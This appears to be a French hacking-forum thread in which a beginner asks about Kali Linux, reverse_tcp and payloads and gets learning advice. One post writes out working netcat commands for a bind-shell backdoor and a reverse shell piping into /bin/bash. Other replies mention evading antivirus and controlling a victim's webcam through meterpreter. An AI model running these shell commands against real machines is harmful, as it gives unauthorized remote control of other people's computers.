Bonjour, je voudrais apprendre à utiliser KaliLinux, j'ai entendut parlé de reverse_tcp, qu'est ce que c'est ? un payload est ce que l'on peut hacker avec un seul payload?

merci de vos réponses sachant que cela  a un but instructif et je ne veut pas hacker, je vaux juste tester avec les différents pc mis à ma disposition.

Merci de vos réponses

Bonjour,

Je ne t'aiderais pas mais si tu cherches sur ce site tu vas trouver: https://www.offensive-security.com/

GuillaumePeyrachon a écrit:

Bonjour, je voudrais apprendre à utiliser KaliLinux, j'ai entendut parlé de reverse_tcp, qu'est ce que c'est ? un payload est ce que l'on peut hacker avec un seul payload?

merci de vos réponses sachant que cela  a un but instructif et je ne veut pas hacker, je vaux juste tester avec les différents pc mis à ma disposition.

Merci de vos réponses

Sa dépend qu'elle machine tu veut hacker et surtout son OS

Et surtout que kali utilise metasploit^^ qui est connu des anti-virus tu vas devoir créer tes propres payload, c'est plus instructif et plus amusant!

-
Edité par Phpanthony 26 avril 2017 à 17:51:57

Phpanthony a écrit:

Et surtout que kali utilise metasploit^^ qui est connu des anti-virus tu vas devoir créer tes propres payload, c'est plus instructif et plus amusant!

-
Edité par Phpanthony il y a environ 4 heures

C'est très amusant, surtout quand il y a des outils très puissants pour contourner les anti virus 

-
Edité par didou140 26 avril 2017 à 22:23:17

Phpanthony a écrit:

Et surtout que kali utilise metasploit^^ qui est connu des anti-virus tu vas devoir créer tes propres payload, c'est plus instructif et plus amusant!

-
Edité par Phpanthony il y a environ 16 heures

comment créer on notre propre payload?

didou140 a écrit:

Phpanthony a écrit:

Et surtout que kali utilise metasploit^^ qui est connu des anti-virus tu vas devoir créer tes propres payload, c'est plus instructif et plus amusant!

-
Edité par Phpanthony il y a environ 4 heures

C'est très amusant, surtout quand il y a des outils très puissants pour contourner les anti virus 

-
Edité par didou140 il y a environ 12 heures

quel genre d'outil?

merci à ceux qui on répondu

Sa depend ce que tu veux faire :), si tu veux faire un revershell pour un site web privilégie le PHP ou python :).

Tu ne vas rien apprendre si tous ce que tu fais c'est cliquer sur Suivant (ou autre) pour qu'un programme te sorte un payload, tu ne sauras meme pas comment il marche, ni comment l'adapter en fonction des situations 

j'aimerais vraiment coder sans avoir à générer un payload comme vous l'avez dit avant mais mon prob c'est que je suis débutant en programmation :/

Déjà pouvez-vous m'expliquer ce qu'est un reverse_tcp???

google est ton ami: https://en.wikipedia.org/wiki/Reverse_connection

DiaXgamerPC a écrit:

j'aimerais vraiment coder sans avoir à générer un payload comme vous l'avez dit avant mais mon prob c'est que je suis débutant en programmation :/

Déjà pouvez-vous m'expliquer ce qu'est un reverse_tcp???

Pour commencer, je te conseil d'utiliser armitage, c'est plus facile et simple a comprendre car c'est graphique :

-Ouvre metasploit

-Ensuite t'ecrit "armitage"

-Tu clique "OK", puis "yes", et c'est bon

après tu peut trouver pas mal de tuto sur le net, nottament sur youtube, exemple :

https://www.youtube.com/watch?v=a0F7BKx_QUo

un autre bien plus poussé :

https://www.youtube.com/watch?v=DdtGyPCtC24

-
Edité par didou140 27 avril 2017 à 12:22:17

Je rejoins ce que dis Phpanthony, ca ne sert a rien d'utiliser des payloads générés sans comprendre ce qu'il y a derriere.. mise à part épater tes potes..et encore quand ils verront que tu devrais désactiver l'anti-virus pour lancer le payload...x'D.

Alors oui il y a sans doute des outils pour contourner les anti-virus mais bon la aussi niveau compréhension du pourquoi du comment...

Tu es débutant en programmation ? Apprends d'abord à crée des petits scripts (web ou logiciel), apprend le SQL, apprend le langage shell, tu verras que quand tu iras crée tes propres payloads ou tes propres outils tu auras du vrai mérite

je te conseil le Python et le C très simple d'utilisation avec un nombre de librairies extraordinaires.

leach74 a écrit:

je te conseil le Python et le C très simple d'utilisation avec un nombre de librairies extraordinaires.

JackBauer75 a écrit:

Tu es débutant en programmation ? Apprends d'abord à crée des petits scripts (web ou logiciel), apprend le SQL, apprend le langage shell, tu verras que quand tu iras crée tes propres payloads ou tes propres outils tu auras du vrai mérite

Quel langage apprendre? j'avais commencé à apprendre le python et j'avais acheter un manuel python pour les nuls... Mais est-ce un bon langage pour commencer à créer des payloads ?

comment savoir comment fonctionne un payload ?

Beaucoup de gens utilisent le Python pour faire du pentesting car le panel de librairies est étonant! et en plus de ca c'est facile. Commence à manipuler les bases de celui ci ensuite tu dois essayer de manipuler des autres librairies

OK merci, c'est ça la bibliothèque python : https://translate.google.fr/translate?hl=fr&sl=en&u=https://docs.python.org/3/library/&prev=search   ?

Je commence par créer quel genre de petit programme?

Oui le python c'est tres bien, commence a apprendre les bases :), par exemple la simulation d'une banque (retrait d'argent, historique, ajout de l'argent blablabla) tu apprendras tous ce qui est base de donnée, sql, les structures de codes etc , ensuite tu peux allez plus loin pour faire communiquer 2 PC (de la meme maniere qu'un payload) et pousser plus loin

Regarde le cours d'OpenClassrooms qui va t'apporter de bonnes bases

OK je vais commencer par ce que vous m'avez dit puis  je viendrais vous voir sur ce topic lorsque j'aurai besoin de vous. :)à

merci à vous

Bonjour, j'essaye de programmer la banque comme vous m'avez dit auparavant, j'ai utiliser le module Tkinter, mon problème est que je ne sais pas créer un bouton qui lorsque l'on clique dessus, il ouvre une pop-up où l'utilisateur peut rentrer une valeur... Merci de m'aider

Le reverse TCP est une méthode qui permet que ce soit l'ordinateur de la victime qui se connecte a l'ordinateur du "pirate", et non l'inverse. Tu peux utiliser psmsf en python pour générer un script en batch. ensuite tu ouvres metasploit et tu écoute sur le port choisi. Et une fois le script batch exec sur l'ordi de la victime, tu pourra prendre le contrôle de son ordinateur (Fait cela que sur tes ordinateurs car sinon c'est illégal!!!)tu peux même accéder à la webcam et faire des screenshots. Recherche meterpreter sur Google et tu verras le nombre de possibilité.

ok merci à toi quentin

Et sinon pouvez-vous m'aider pour le message que j'ai posté au-dessus

Hum, ça fait deux jours que tu te met au Python et tu veux déjà faire une interface graphique ?

C'est trop tôt à mon avis, continue à suivre le cours que tu as choisi.

Merci de votre réponse :), j'avais commencé à apprendre Python y environ 6 mois/1 an et j'avais arrêté mais là j'ai repris, et vu pratiquement la totalité du cours de Openclassroom sur Python...

Pouvez-vous donc m'aguiller sur la réponse que j'attends sur la 3émé réponse au-dessus...

Bonjour,

Si tu veux t'amuser avec du reverse shell il y a une commande qui marche trés bien et qui te permet de comprendre le fonctionnement primaire shell.

la commande (que tous le monde connais ce n'est pas un scoop désolé c'est nc ou netcat ou ncat

En bref vous prennez un de vos PC sous Linux et vous faites les commandes suivante:

1) Serveur WEB

PC1 : 192.168.0.2

PC1 $ echo "Ca c'est un site web" > /tmp/index.html
PC1 $ sudo nc -l -p 80 < /tmp/index.html

Ensuite vous mettez l'adresse IP de la machine qui execute la commande dans l'url de votre navigateur web. Dans l'exemple il faudrait mettre 192.168.0.2 dans l'URL de mon navigateur (firefox, chrome, ...)

2) Tchat pourrit

PC1 = 192.168.0.2

PC2 =  192.168.0.3

PC1 $ nc -l -p 8000

PC2 $ nc 192.168.0.2 8000

3) Backdoor lowcoast

PC_Cible =192.168.0.2

PC2 =  192.168.0.3

PC_Cible $ mkfifo /tmp/door
PC_Cible $ nc -l -p 12000 < /tmp/door | /bin/bash > /tmp/door 2>&1

PC2$ nc 192.168.0.2 12000

 4) Backdoor reverse shell lowcoast

PC_Cible = 192.168.0.2

PC2  =  192.168.0.3

PC2$ nc -l -p 12000

PC_Cible $ mkfifo /tmp/door
PC_Cible $ nc 192.168.0.3 12000 < /tmp/door | /bin/bash > /tmp/door 2>&1

PS: Il se peut que vous ayez des problèmes avec vôtre pare-feu pour les essais il peut étre pas mal de le désactiver. Dans la réalité ont est pas obligé d'étre si brutal mais la gestion du pare feu c'est une autre histoire.

-
Edité par Anonyme 11 mai 2017 à 13:37:55

ok merci de ton message mais cette manipe consiste exactement à faire quoi?

DiaXgamerPC a écrit:

ok merci de ton message mais cette manipe consiste exactement à faire quoi?

Sa crée une backdoor, en gros ton pc pourra se connecter dans le pc vicitme, mais cette méthode est très détectable par les anti-virus ou même par l'utilisateur.

Au pire, fait l'éffet inverse en utilisant du reverse_tcp, c'est bien plus meilleur et tu peut le rendre indectable par la majorité des antivirus

-
Edité par didou140 7 mai 2017 à 20:29:21

didou140 a écrit:

Sa crée une backdoor, en gros ton pc pourra se connecter dans le pc vicitme, mais cette méthode est très détectable par les anti-virus ou même par l'utilisateur.

Au pire, fait l'éffet inverse en utilisant du reverse_tcp, c'est bien plus meilleur et tu peut le rendre indectable par la majorité des antivirus

-
Edité par didou140 about 14 hours ago

- Avant de le faire a l'envers il est pas mal de le faire a l'endroit non?

- la partie  "4) Backdoor reverse shell lowcoast" est un reverse shell ,) plus précisement un effet inversé  :}

- Sur linux perso j'utilise pas d'anti-virus .)

DiaXgamerPC a écrit:

ok merci de ton message mais cette manipe consiste exactement à faire quoi?

Ce sont 4 manipulations/résultats différents. Mais dans la base netcat ouvre un socket/port sur ta machine. Vous pouvez comparer ça à une porte.

Sinon petit rappel:

man nc

Aprés ou avant comme vous voulez:

https://fr.wikipedia.org/wiki/Netcat

Mieux:

https://en.wikipedia.org/wiki/Netcat

Et un petit cadeau ,) :

http://crack-wifi.com/forum/topic-2507-backdoor-pour-noobz-sous-win.html

-
Edité par Anonyme 8 mai 2017 à 12:59:46

Ce sont 4 manipulations/résultats différents. Mais dans la base netcat ouvre un socket/port sur ta machine. Vous pouvez comparer ça à une porte.

Dsl mais c'est quoi netcat? et ça sert à quoi d'ouvrir un socket/port? Merci de vos réponses

 oO  ?

Ouvrir un port ça permet de faire rentrer les bateaux. Et duckduckgo permet de surfer sur le net.

PS: Il y a des liens dans mon poste précédant, regardez les et si vous ne les comprenez pas il y a un cours sur TCP/IPsur le site du zéro.

-
Edité par Anonyme 11 mai 2017 à 11:36:55

DiaXgamerPC a écrit:

Ce sont 4 manipulations/résultats différents. Mais dans la base netcat ouvre un socket/port sur ta machine. Vous pouvez comparer ça à une porte.

Dsl mais c'est quoi netcat? et ça sert à quoi d'ouvrir un socket/port? Merci de vos réponses

Ok, laisse kali linux et go sur une debian ou ubuntu et apprend les commandes de bases ainsi que qui fait quoi etc et comment faire communiquer 2 pc